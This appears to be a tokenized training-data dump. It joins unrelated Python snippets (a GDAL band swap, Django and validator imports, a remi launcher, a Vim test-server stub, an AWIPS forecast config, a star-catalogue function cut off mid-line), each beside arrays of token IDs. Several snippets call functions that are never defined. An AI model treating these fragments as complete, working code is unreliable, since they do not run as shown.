220, 220, 9647, 796, 604, 11, 201, 198, 220, 220, 220, 275, 67, 796, 642, 11, 201, 198, 220, 220, 220, 4075, 25249, 11639, 11186, 6, 201, 198, 8, 201, 198, 2, 1939, 53, 5978, 496, 33, 34106, 13, 25928, 7, 808, 28, 16, 11, 28665, 28, 18, 11, 808, 12626, 28, 17, 8, 201, 198, 1939, 53, 5978, 496, 33, 34106, 13, 8002, 7, 15636, 87, 796, 838, 11, 279, 4597, 796, 838, 11, 541, 324, 87, 28, 940, 11, 541, 4597, 28, 940, 11, 11201, 392, 28, 17821, 11, 20797, 11639, 16885, 3256, 1589, 2625, 9464, 4943, 201, 198, 201, 198, 23074, 33, 34106, 796, 256, 74, 3849, 13, 21864, 7, 14535, 11, 201, 198, 220, 220, 220, 2420, 2625, 12322, 5555, 1600, 201, 198, 220, 220, 220, 10369, 28, 75, 70, 23252, 11, 201, 198, 220, 220, 220, 3141, 28, 20657, 6191, 11, 201, 198, 220, 220, 220, 6001, 796, 362, 11, 201, 198, 220, 220, 220, 277, 70, 796, 366, 13424, 1600, 201, 198, 220, 220, 220, 275, 70, 796, 705, 2, 5777, 3324, 1314, 3256, 201, 198, 220, 220, 220, 9647, 796, 838, 11, 201, 198, 220, 220, 220, 275, 67, 796, 642, 11, 201, 198, 220, 220, 220, 4075, 25249, 11639, 11186, 6, 201, 198, 8, 201, 198, 2, 23074, 33, 34106, 13, 25928, 7, 808, 28, 19, 11, 28665, 28, 16, 11, 808, 12626, 28, 17, 11, 14841, 87, 28, 1238, 11, 279, 4597, 28, 20, 8, 201, 198, 23074, 33, 34106, 13, 8002, 7, 15636, 87, 796, 838, 11, 279, 4597, 796, 838, 11, 20966, 324, 87, 28, 940, 11, 541, 4597, 28, 940, 11, 11201, 392, 28, 17821, 11, 20797, 11639, 16885, 3256, 1589, 2625, 9464, 4943, 201, 198, 201, 198, 47391, 21864, 796, 256, 74, 3849, 13, 21864, 7, 201, 198, 220, 220, 220, 5739, 11, 201, 198, 220, 220, 220, 2420, 2625, 10917, 2043, 1600, 201, 198, 220, 220, 220, 10369, 28, 75, 70, 23252, 11, 201, 198, 220, 220, 220, 3141, 28, 47391, 11, 201, 198, 220, 220, 220, 6001, 796, 362, 11, 201, 198, 220, 220, 220, 277, 70, 796, 366, 13424, 1600, 201, 198, 220, 220, 220, 9647, 796, 642, 11, 201, 198, 220, 220, 220, 275, 70, 796, 705, 445, 3256, 201, 198, 220, 220, 220, 275, 67, 796, 642, 201, 198, 8, 201, 198, 2, 47391, 21864, 13, 25928, 7, 808, 28, 19, 11, 28665, 28, 18, 11, 808, 12626, 28, 17, 11, 14841, 87, 28, 1238, 11, 279, 4597, 28, 20, 8, 201, 198, 47391, 21864, 13, 8002, 7, 15636, 87, 796, 838, 11, 279, 4597, 796, 838, 11, 541, 324, 87, 28, 940, 11, 541, 4597, 28, 940, 11, 11201, 392, 28, 17821, 11, 20797, 11639, 16885, 3256, 1589, 2625, 9464, 4943, 201, 198, 201, 198, 30488, 3849, 13, 12417, 26268, 3419 ]
2.54474
1,654
from collections import defaultdict from app import error_messages from app.validators.answers import get_answer_validator from app.validators.blocks import get_block_validator from app.validators.questionnaire_schema import get_object_containing_key from app.validators.questions import get_question_validator from app.validators.routing.new_routing_validator import NewRoutingValidator from app.validators.routing.new_when_rule_validator import NewWhenRuleValidator from app.validators.routing.routing_validator import RoutingValidator from app.validators.routing.when_rule_validator import WhenRuleValidator from app.validators.validator import Validator from app.validators.value_source_validator import ValueSourceValidator
[ 6738, 17268, 1330, 4277, 11600, 198, 198, 6738, 598, 1330, 4049, 62, 37348, 1095, 198, 6738, 598, 13, 12102, 2024, 13, 504, 86, 364, 1330, 651, 62, 41484, 62, 12102, 1352, 198, 6738, 598, 13, 12102, 2024, 13, 27372, 1330, 651, 62, 9967, 62, 12102, 1352, 198, 6738, 598, 13, 12102, 2024, 13, 25652, 24042, 62, 15952, 2611, 1330, 651, 62, 15252, 62, 38301, 62, 2539, 198, 6738, 598, 13, 12102, 2024, 13, 6138, 507, 1330, 651, 62, 25652, 62, 12102, 1352, 198, 6738, 598, 13, 12102, 2024, 13, 81, 13660, 13, 3605, 62, 81, 13660, 62, 12102, 1352, 1330, 968, 49, 13660, 47139, 1352, 198, 6738, 598, 13, 12102, 2024, 13, 81, 13660, 13, 3605, 62, 12518, 62, 25135, 62, 12102, 1352, 1330, 968, 2215, 31929, 47139, 1352, 198, 6738, 598, 13, 12102, 2024, 13, 81, 13660, 13, 81, 13660, 62, 12102, 1352, 1330, 371, 13660, 47139, 1352, 198, 6738, 598, 13, 12102, 2024, 13, 81, 13660, 13, 12518, 62, 25135, 62, 12102, 1352, 1330, 1649, 31929, 47139, 1352, 198, 6738, 598, 13, 12102, 2024, 13, 12102, 1352, 1330, 48951, 1352, 198, 6738, 598, 13, 12102, 2024, 13, 8367, 62, 10459, 62, 12102, 1352, 1330, 11052, 7416, 47139, 1352, 628 ]
3.636816
201
""" Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import remi.gui as gui from remi import start, App import os if __name__ == "__main__": # starts the webserver start(MyApp, address='0.0.0.0', port=0, start_browser=True, username=None, password=None)
[ 37811, 198, 220, 220, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 220, 220, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 220, 220, 921, 743, 7330, 257, 4866, 286, 262, 13789, 379, 628, 220, 220, 220, 220, 220, 220, 2638, 1378, 2503, 13, 43073, 13, 2398, 14, 677, 4541, 14, 43, 2149, 24290, 12, 17, 13, 15, 628, 220, 220, 17486, 2672, 416, 9723, 1099, 393, 4987, 284, 287, 3597, 11, 3788, 198, 220, 220, 9387, 739, 262, 13789, 318, 9387, 319, 281, 366, 1921, 3180, 1, 29809, 1797, 11, 198, 220, 220, 42881, 34764, 11015, 6375, 7102, 49828, 11053, 3963, 15529, 509, 12115, 11, 2035, 4911, 393, 17142, 13, 198, 220, 220, 4091, 262, 13789, 329, 262, 2176, 3303, 15030, 21627, 290, 198, 220, 220, 11247, 739, 262, 13789, 13, 198, 37811, 198, 198, 11748, 816, 72, 13, 48317, 355, 11774, 198, 6738, 816, 72, 1330, 923, 11, 2034, 198, 11748, 28686, 628, 198, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, 220, 220, 1303, 4940, 262, 2639, 18497, 198, 220, 220, 220, 923, 7, 3666, 4677, 11, 2209, 11639, 15, 13, 15, 13, 15, 13, 15, 3256, 2493, 28, 15, 11, 923, 62, 40259, 28, 17821, 11, 20579, 28, 14202, 11, 9206, 28, 14202, 8, 198 ]
3.385965
228
"""Swap bands in a raster satellite image""" # http://git.io/vqs41 from gdal import gdal_array # name of our source image src = "FalseColor.tif" # load the source image into an array arr = gdal_array.LoadFile(src) # swap bands 1 and 2 for a natural color image. # We will use numpy "advanced slicing" to reorder the bands. # Using the source image output = gdal_array.SaveArray(arr[[1, 0, 2], :], "swap.tif", format="GTiff", prototype=src) # Dereference output to avoid corrupted file on some platforms output = None
[ 37811, 10462, 499, 11760, 287, 257, 374, 1603, 11210, 2939, 37811, 198, 198, 2, 2638, 1378, 18300, 13, 952, 14, 85, 48382, 3901, 198, 198, 6738, 308, 31748, 1330, 308, 31748, 62, 18747, 198, 198, 2, 1438, 286, 674, 2723, 2939, 198, 10677, 796, 366, 25101, 10258, 13, 49929, 1, 198, 198, 2, 3440, 262, 2723, 2939, 656, 281, 7177, 198, 3258, 796, 308, 31748, 62, 18747, 13, 8912, 8979, 7, 10677, 8, 198, 198, 2, 16075, 11760, 352, 290, 362, 329, 257, 3288, 3124, 2939, 13, 198, 2, 775, 481, 779, 299, 32152, 366, 32225, 2903, 49289, 1, 284, 302, 2875, 262, 11760, 13, 198, 2, 8554, 262, 2723, 2939, 198, 22915, 796, 308, 31748, 62, 18747, 13, 16928, 19182, 7, 3258, 30109, 16, 11, 657, 11, 362, 4357, 1058, 4357, 366, 2032, 499, 13, 49929, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5794, 2625, 19555, 733, 1600, 14879, 28, 10677, 8, 198, 2, 360, 567, 4288, 5072, 284, 3368, 26940, 2393, 319, 617, 9554, 198, 22915, 796, 6045 ]
2.919355
186
import os import matplotlib.pyplot as plt import scipy.io.wavfile as wav from runner import Runner
[ 11748, 28686, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 629, 541, 88, 13, 952, 13, 45137, 7753, 355, 266, 615, 198, 198, 6738, 17490, 1330, 21529, 198 ]
3.030303
33
from django.apps import AppConfig from photo.config import app_config
[ 6738, 42625, 14208, 13, 18211, 1330, 2034, 16934, 198, 6738, 4590, 13, 11250, 1330, 598, 62, 11250, 198 ]
3.888889
18
#!/usr/bin/env python # # Server that will accept connections from a Vim channel. # Used by test_channel.vim. # # This requires Python 2.6 or later. from __future__ import print_function import json import socket import sys import time import threading try: # Python 3 import socketserver except ImportError: # Python 2 import SocketServer as socketserver if __name__ == "__main__": main("localhost", 0)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 198, 2, 9652, 326, 481, 2453, 8787, 422, 257, 36645, 6518, 13, 198, 2, 16718, 416, 1332, 62, 17620, 13, 31124, 13, 198, 2, 198, 2, 770, 4433, 11361, 362, 13, 21, 393, 1568, 13, 198, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 33918, 198, 11748, 17802, 198, 11748, 25064, 198, 11748, 640, 198, 11748, 4704, 278, 198, 198, 28311, 25, 198, 220, 220, 220, 1303, 11361, 513, 198, 220, 220, 220, 1330, 37037, 18497, 198, 16341, 17267, 12331, 25, 198, 220, 220, 220, 1303, 11361, 362, 198, 220, 220, 220, 1330, 47068, 10697, 355, 37037, 18497, 198, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, 220, 220, 1388, 7203, 36750, 1600, 657, 8, 198 ]
3.186567
134
## # This software was developed and / or modified by Raytheon Company, # pursuant to Contract DG133W-05-CQ-1067 with the US Government. # # U.S. EXPORT CONTROLLED TECHNICAL DATA # This software product contains export-restricted data whose # export/transfer/disclosure is restricted by U.S. law. Dissemination # to non-U.S. persons whether in the United States or abroad requires # an export license or other authorization. # # Contractor Name: Raytheon Company # Contractor Address: 6825 Pine Street, Suite 340 # Mail Stop B8 # Omaha, NE 68106 # 402.291.0100 # # See the AWIPS II Master Rights File ("Master Rights File.pdf") for # further licensing information. ## ## # This is a base file that is not intended to be overridden. ## # --------------------------------------------------------------------- # This software is in the public domain, furnished "as is", without # technical support, and with no warranty, express or implied, as to # its usefulness for any purpose. # # CWF_Pacific_<site>_<MultiPil>_Definition.TextUtility # # This file sets up all the Product Definition overrides for the # CWF_Pacific formatter for a site. # # --------------------------------------------------------------------- #********************************************************************** # MAKE NO CHANGES HERE # The minimum content of this file is the following Definition statement Definition = {} # End MAKE NO CHANGES HERE #********************************************************************** ##################################################### # Override VariableList if desired # #VariableList = [] #----- WFO <site> CWF_Pacific Definition ----- # Definition Statements must start in column 1. # REQUIRED CONFIGURATION ITEMS #Definition['displayName'] = None Definition['displayName'] = "CWFPacific_<MultiPil>" Definition["showZoneCombiner"] = 1 # 1 to cause zone combiner to display Definition["defaultEditAreas"] = "Combinations_CWF_<site>_<MultiPil>" Definition["mapNameForCombinations"] = "Marine_Zones_<site>" # Map background for creating Combinations #Special multiple product domains for certain sites: if "<site>" == "AJK": if "_<MultiPil>" == "_AJK": Definition["subDomainUGCs"] = ["PKZ011","PKZ012","PKZ013","PKZ021", "PKZ022","PKZ031","PKZ032","PKZ033", "PKZ034","PKZ035","PKZ036"] elif "_<MultiPil>" == "_AEG": Definition["subDomainUGCs"] = ["PKZ041","PKZ042","PKZ043","PKZ051", "PKZ052"] elif "<site>" == "GUM": if "_<MultiPil>" == "_MY": Definition["subDomainUGCs"] = ["PMZ151","PMZ152","PMZ153","PMZ154"] elif "_<MultiPil>" == "_PQ": Definition["subDomainUGCs"] = ["PMZ161","PMZ171","PMZ172","PMZ173", "PMZ174","PMZ181","PMZ191"] elif "<site>" == "AFG": if "_<MultiPil>" == "_NSB": Definition["subDomainUGCs"] = ["PKZ225","PKZ230","PKZ235","PKZ240", "PKZ245"] elif "_<MultiPil>" == "_WCZ": Definition["subDomainUGCs"] = ["PKZ200","PKZ210","PKZ215","PKZ220"] # Header configuration items #Definition["productName"] = "Coastal Waters Forecast" # name of product Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter) Definition["wmoID"] = "<wmoID>" # WMO ID Definition["pil"] = "<pil>" # product pil Definition["areaName"] = "<state>" # Name of state, such as "Georgia" Definition["wfoCityState"] = "<wfoCityState>" # Location of WFO - city st Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database. Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN. Definition["outputFile"] = "{prddir}/TEXT/CWF_<MultiPil>.txt" # OPTIONAL CONFIGURATION ITEMS #Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC" #Definition["debug"] = 1 #Definition["hazardSamplingThreshold"] = (10, None) #(%cov, #points) #Definition["editAreaSuffix"] = "_pt" #Definition["periodCombining"] = 1 # If 1, do period combining #Definition["includeEveningPeriod"] = 0 # If 1, include Evening Period #Definition["useAbbreviations"] = 0 # If 1, use marine abbreviations # Weather-related flags #Definition["hoursSChcEnds"] = 24 # River Bar Zones #Definition["riverBarZones"] = [] #Definition["areaDictionary"] = "AreaDictionary" # For product headers #Definition["language"] = "english" #Definition["lineLength"] = 66 #Definition["useHolidays"] = 1 # Trouble-shooting items #Definition["passLimit"] = 20 # Limit on passes allowed through Narrative Tree #Definition["trace"] = 1 # Set to 1 to turn on trace through # Narrative Tree for trouble-shooting
[ 2235, 198, 2, 770, 3788, 373, 4166, 290, 1220, 393, 9518, 416, 7760, 1169, 261, 5834, 11, 198, 2, 12997, 284, 17453, 46133, 16945, 54, 12, 2713, 12, 34, 48, 12, 940, 3134, 351, 262, 1294, 5070, 13, 201, 198, 2, 220, 201, 198, 2, 471, 13, 50, 13, 7788, 15490, 27342, 46, 3069, 1961, 44999, 45, 20151, 42865, 201, 198, 2, 770, 3788, 1720, 4909, 10784, 12, 49343, 1366, 3025, 198, 2, 10784, 14, 39437, 14, 6381, 17966, 318, 10770, 416, 471, 13, 50, 13, 1099, 13, 3167, 325, 17928, 198, 2, 284, 1729, 12, 52, 13, 50, 13, 6506, 1771, 287, 262, 1578, 1829, 393, 10522, 4433, 198, 2, 281, 10784, 5964, 393, 584, 19601, 13, 198, 2, 220, 198, 2, 17453, 273, 6530, 25, 220, 220, 220, 220, 220, 220, 220, 7760, 1169, 261, 5834, 201, 198, 2, 17453, 273, 17917, 25, 220, 220, 220, 220, 8257, 1495, 23076, 3530, 11, 26264, 28560, 201, 198, 2, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 11099, 13707, 347, 23, 201, 198, 2, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 37053, 11, 10635, 8257, 15801, 201, 198, 2, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 42622, 13, 33551, 13, 39103, 201, 198, 2, 220, 201, 198, 2, 4091, 262, 14356, 47643, 2873, 5599, 6923, 9220, 5855, 18254, 6923, 9220, 13, 12315, 4943, 329, 198, 2, 2252, 15665, 1321, 13, 198, 2235, 198, 198, 2235, 198, 2, 770, 318, 257, 2779, 2393, 326, 318, 407, 5292, 284, 307, 23170, 4651, 13, 198, 2235, 198, 198, 2, 16529, 30934, 198, 2, 770, 3788, 318, 287, 262, 1171, 7386, 11, 30760, 366, 292, 318, 1600, 1231, 198, 2, 6276, 220, 1104, 11, 290, 351, 645, 18215, 11, 4911, 393, 17142, 11, 355, 284, 198, 2, 663, 37496, 329, 597, 4007, 13, 198, 2, 198, 2, 24006, 37, 62, 22933, 62, 27, 15654, 29, 62, 27, 29800, 47, 346, 29, 62, 36621, 13, 8206, 18274, 879, 198, 2, 198, 2, 220, 770, 2393, 5621, 510, 477, 262, 8721, 30396, 23170, 1460, 329, 262, 220, 198, 2, 220, 24006, 37, 62, 22933, 1296, 1436, 329, 257, 2524, 13, 220, 198, 2, 198, 2, 16529, 30934, 198, 198, 2, 17174, 17174, 2466, 1174, 198, 2, 39134, 8005, 5870, 15567, 1546, 15698, 198, 2, 383, 5288, 2695, 286, 428, 2393, 318, 262, 1708, 30396, 2643, 198, 198, 36621, 796, 23884, 198, 198, 2, 5268, 39134, 8005, 5870, 15567, 1546, 15698, 198, 2, 17174, 17174, 2466, 1174, 198, 29113, 14468, 4242, 2, 198, 2, 3827, 13154, 35748, 8053, 611, 10348, 198, 2, 198, 2, 43015, 8053, 796, 17635, 198, 198, 2, 30934, 370, 6080, 1279, 15654, 29, 24006, 37, 62, 22933, 30396, 37404, 198, 2, 30396, 44936, 1276, 923, 287, 5721, 352, 13, 198, 2, 4526, 10917, 37819, 25626, 4261, 6234, 7283, 39201, 220, 198, 2, 36621, 17816, 13812, 5376, 20520, 796, 6045, 198, 36621, 17816, 13812, 5376, 20520, 796, 366, 43538, 5837, 330, 811, 62, 27, 29800, 47, 346, 24618, 198, 198, 36621, 14692, 12860, 26961, 20575, 7274, 8973, 796, 352, 1303, 352, 284, 2728, 6516, 1974, 7274, 284, 3359, 198, 36621, 14692, 12286, 18378, 8491, 292, 8973, 796, 366, 20575, 7352, 62, 43538, 37, 62, 27, 15654, 29, 62, 27, 29800, 47, 346, 24618, 198, 36621, 14692, 8899, 5376, 1890, 20575, 7352, 8973, 796, 366, 7676, 500, 62, 57, 1952, 62, 27, 15654, 24618, 1303, 9347, 4469, 329, 4441, 14336, 7352, 198, 198, 2, 13409, 3294, 1720, 18209, 329, 1728, 5043, 25, 198, 361, 33490, 15654, 24618, 6624, 366, 32, 41, 42, 1298, 198, 220, 220, 220, 611, 45434, 27, 29800, 47, 346, 24618, 6624, 45434, 32, 41, 42, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 30396, 14692, 7266, 43961, 31179, 82, 8973, 796, 14631, 40492, 57, 28555, 2430, 40492, 57, 30206, 2430, 40492, 57, 30273, 2430, 40492, 57, 46821, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 40492, 57, 44087, 2430, 40492, 57, 43637, 2430, 40492, 57, 49959, 2430, 40492, 57, 44427, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 40492, 57, 49841, 2430, 40492, 57, 44215, 2430, 40492, 57, 48597, 8973, 198, 220, 220, 220, 1288, 361, 45434, 27, 29800, 47, 346, 24618, 6624, 45434, 32, 7156, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 30396, 14692, 7266, 43961, 31179, 82, 8973, 796, 14631, 40492, 57, 50049, 2430, 40492, 57, 3023, 17, 2430, 40492, 57, 48768, 2430, 40492, 57, 2713, 16, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 40492, 57, 37841, 8973, 198, 417, 361, 33490, 15654, 24618, 6624, 366, 38, 5883, 1298, 198, 220, 220, 220, 611, 45434, 27, 29800, 47, 346, 24618, 6624, 45434, 26708, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 30396, 14692, 7266, 43961, 31179, 82, 8973, 796, 14631, 5868, 57, 24309, 2430, 5868, 57, 17827, 2430, 5868, 57, 21395, 2430, 5868, 57, 21526, 8973, 198, 220, 220, 220, 1288, 361, 45434, 27, 29800, 47, 346, 24618, 6624, 45434, 47, 48, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 30396, 14692, 7266, 43961, 31179, 82, 8973, 796, 14631, 5868, 57, 25948, 2430, 5868, 57, 27192, 2430, 5868, 57, 23628, 2430, 5868, 57, 25399, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 5868, 57, 22985, 2430, 5868, 57, 27057, 2430, 5868, 57, 26492, 8973, 198, 198, 417, 361, 33490, 15654, 24618, 6624, 366, 8579, 38, 1298, 198, 220, 220, 220, 611, 45434, 27, 29800, 47, 346, 24618, 6624, 45434, 8035, 33, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 30396, 14692, 7266, 43961, 31179, 82, 8973, 796, 14631, 40492, 57, 18182, 2430, 40492, 57, 19214, 2430, 40492, 57, 22370, 2430, 40492, 57, 16102, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 40492, 57, 22995, 8973, 198, 220, 220, 220, 1288, 361, 45434, 27, 29800, 47, 346, 24618, 6624, 45434, 27353, 57, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 30396, 14692, 7266, 43961, 31179, 82, 8973, 796, 14631, 40492, 57, 2167, 2430, 40492, 57, 21536, 2430, 40492, 57, 23349, 2430, 40492, 57, 17572, 8973, 628, 198, 198, 2, 48900, 8398, 3709, 198, 2, 36621, 14692, 11167, 5376, 8973, 796, 366, 7222, 459, 282, 21827, 4558, 2701, 1, 220, 1303, 1438, 286, 1720, 198, 36621, 14692, 12853, 12367, 2389, 8973, 796, 33490, 12853, 12367, 2389, 24618, 220, 1303, 1336, 4429, 27421, 357, 19, 9291, 8, 198, 36621, 14692, 86, 5908, 2389, 8973, 796, 33490, 86, 5908, 2389, 24618, 220, 220, 220, 220, 220, 220, 220, 1303, 370, 11770, 4522, 198, 36621, 14692, 79, 346, 8973, 796, 33490, 79, 346, 24618, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1720, 5560, 198, 36621, 14692, 20337, 5376, 8973, 796, 33490, 5219, 24618, 220, 1303, 6530, 286, 1181, 11, 884, 355, 366, 41072, 1, 198, 36621, 14692, 86, 6513, 14941, 9012, 8973, 796, 33490, 86, 6513, 14941, 9012, 24618, 220, 1303, 13397, 286, 370, 6080, 532, 1748, 336, 198, 36621, 14692, 5239, 9945, 47, 346, 8973, 796, 33490, 5239, 9945, 47, 346, 24618, 220, 220, 220, 220, 220, 220, 1303, 8721, 4522, 329, 23069, 284, 14356, 47643, 2420, 6831, 13, 198, 36621, 14692, 707, 2419, 54, 1565, 47, 346, 8973, 796, 33490, 707, 2419, 54, 1565, 47, 346, 24618, 220, 220, 1303, 8721, 4522, 329, 39573, 284, 14356, 47643, 370, 1565, 13, 198, 36621, 14692, 22915, 8979, 8973, 796, 220, 45144, 1050, 1860, 343, 92, 14, 32541, 14, 43538, 37, 62, 27, 29800, 47, 346, 28401, 14116, 1, 198, 198, 2, 39852, 2849, 1847, 25626, 4261, 6234, 7283, 39201, 198, 2, 36621, 14692, 48806, 8973, 796, 366, 28529, 1, 220, 220, 220, 1303, 8090, 6831, 13, 366, 28529, 1600, 366, 37, 66, 301, 1600, 393, 366, 37719, 1, 198, 2, 36621, 14692, 24442, 8973, 796, 352, 198, 2, 36621, 14692, 37598, 16305, 11347, 817, 10126, 8973, 796, 357, 940, 11, 6045, 8, 220, 1303, 7, 4, 66, 709, 11, 1303, 13033, 8, 198, 2, 36621, 14692, 19312, 30547, 50, 1648, 844, 8973, 796, 45434, 457, 1, 198, 198, 2, 36621, 14692, 41007, 20575, 3191, 8973, 796, 352, 220, 220, 220, 220, 1303, 1002, 352, 11, 466, 2278, 19771, 198, 2, 36621, 14692, 17256, 6104, 278, 5990, 2101, 8973, 796, 657, 1303, 1002, 352, 11, 2291, 31867, 18581, 198, 2, 36621, 14692, 1904, 4826, 4679, 8903, 602, 8973, 796, 657, 220, 220, 220, 220, 1303, 1002, 352, 11, 779, 16050, 37640, 602, 220, 198, 198, 2, 15615, 12, 5363, 9701, 198, 2, 36621, 14692, 24425, 50, 1925, 66, 12915, 82, 8973, 796, 1987, 198, 2, 5866, 2409, 1168, 1952, 198, 2, 36621, 14692, 38291, 10374, 57, 1952, 8973, 796, 17635, 198, 198, 2, 36621, 14692, 20337, 35, 14188, 8973, 796, 366, 30547, 35, 14188, 1, 220, 220, 220, 220, 1303, 1114, 1720, 24697, 198, 2, 36621, 14692, 16129, 8973, 796, 366, 39126, 1, 198, 2, 36621, 14692, 1370, 24539, 8973, 796, 7930, 198, 2, 36621, 14692, 1904, 39, 10180, 592, 8973, 796, 352, 198, 198, 2, 34179, 12, 1477, 12494, 3709, 198, 2, 36621, 14692, 6603, 39184, 8973, 796, 1160, 220, 220, 220, 220, 220, 220, 1303, 27272, 319, 8318, 3142, 832, 28390, 876, 12200, 198, 2, 36621, 14692, 40546, 8973, 796, 352, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5345, 284, 352, 284, 1210, 319, 12854, 832, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 28390, 876, 12200, 329, 5876, 12, 1477, 12494, 198 ]
2.765791
1,789
from django.db import models from django.utils.translation import ugettext_lazy as _ from ...commons.models import BaseModel
[ 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 42625, 14208, 13, 26791, 13, 41519, 1330, 334, 1136, 5239, 62, 75, 12582, 355, 4808, 198, 198, 6738, 2644, 9503, 684, 13, 27530, 1330, 7308, 17633, 628 ]
3.527778
36
NOT_AVAILABLE = 'N/A'
[ 11929, 62, 10116, 32, 4146, 17534, 796, 705, 45, 14, 32, 6, 198 ]
1.692308
13
import numpy as np import pandas as pd import time, gc from GV_Catalogue_Gen import angularDistance def genSigmaCatalogue(CATALOGUE, mag_limit = 6, FOV_limit = 20): ''' Generates the mean of the sigma for each star in the catalogue. Sigma between star A and star B is defined as (1/6) of the angular distance between the two stars. Such values of sigma are calculated for star A to every other star in the catalogue that are its nearest neighbours, i.e., all those stars within a circular FOV defined by FOV_limit. This set of sigma values is defined as sigma_n. The mean of all the elements of sigma_n gives us mu_n. This mean value is paired with the corresponding star A. This process repeats for every star in the catalogue, and the star IDs the corresponding mu_n values are collated in a dataframe. Parameters ---------- CATALOGUE : pd.Dataframe The 'master' star catalogue on which the function works mag_limit : floating-point number, default = 6 The upper magnitude limit of stars that are required in the reference catalogue FOV_limit: floating-point number, default = 20 Defines the circular radius (in degrees) which demarcates which stars from the catalogue are to be considered as nearest neighbours for a given star Returns ------- SIGMA_CATALOGUE : pd.Dataframe The dataframe collated from the star IDs and their corresponding mu_n ''' # Start clock-1 start1 = time.time() # Generate restricted catalogue based on upper magnitude limit temp0 = CATALOGUE[CATALOGUE.Mag <= mag_limit] # Number of rows in the resticted catalogue rows = temp0.shape[0] # Resets the index of <temp0> temp0.index = list(range(rows)) # Prints total number of stars in <temp0> and the (n)X(n-1)- unique combinations per star print('Number of stars - ', rows) print('Number of unique combinations per star= ', (rows-1)*rows) # Initialize the number of iterations to take place no_iter = (rows) # Initialize SIGMA_CATALOGUE SIGMA_CATALOGUE = pd.DataFrame(columns=['Star_ID', 'mu_n']) for i in range(no_iter): # Throws error if an iteration runs beyond number of available rows in <temp0> assert i<(rows), 'IndexError: iterating beyond available number of rows' # Generates <temp1> dataframe which has the (i - th) star of <temp0> # repetated (rows-1) times temp1 = pd.DataFrame(columns = ['Star_ID1','RA_1', 'Dec_1', 'Mag_1']) s1, ra, dec, mag = temp0.iloc[i] temp1.loc[0] = [s1] + [ra] + [dec] + [mag] temp1 = pd.concat([temp1]*(rows-1), ignore_index=True) # Stores value of the star_ID for which mu_n will be calculated star_id_i = s1 # Generates <temp2> dataframe by copying values of <temp0> and dropping the # (i -th) row from it temp2 = temp0 temp2 = temp2.drop([i], axis = 0) # Resets the index temp2.index = list(range(0, rows-1)) # Concatenates <temp1> & <temp2> side-by-side such that resulting <temp3> has (8) columns altogether temp3 = pd.concat([temp1, temp2], axis=1) # Renaming columns of <temp3> temp3.columns = ['Star_ID1','RA_1', 'Dec_1', 'Mag_1', 'Star_ID2', 'RA_2', 'Dec_2', 'Mag_2'] # Calculate angular distance between the two stars present in every row in <temp3> cols = ['RA_1', 'RA_2', 'Dec_1', 'Dec_2'] temp3['Ang_Distance'] = temp3.apply(angularDistance, axis = 1, col_names = cols) # Generates <temp4> by selecting rows from <temp3> whose angular distances is # less than equal to the circular FOV limit temp4 = temp3[temp3.Ang_Distance <= FOV_limit] # Stores the value of 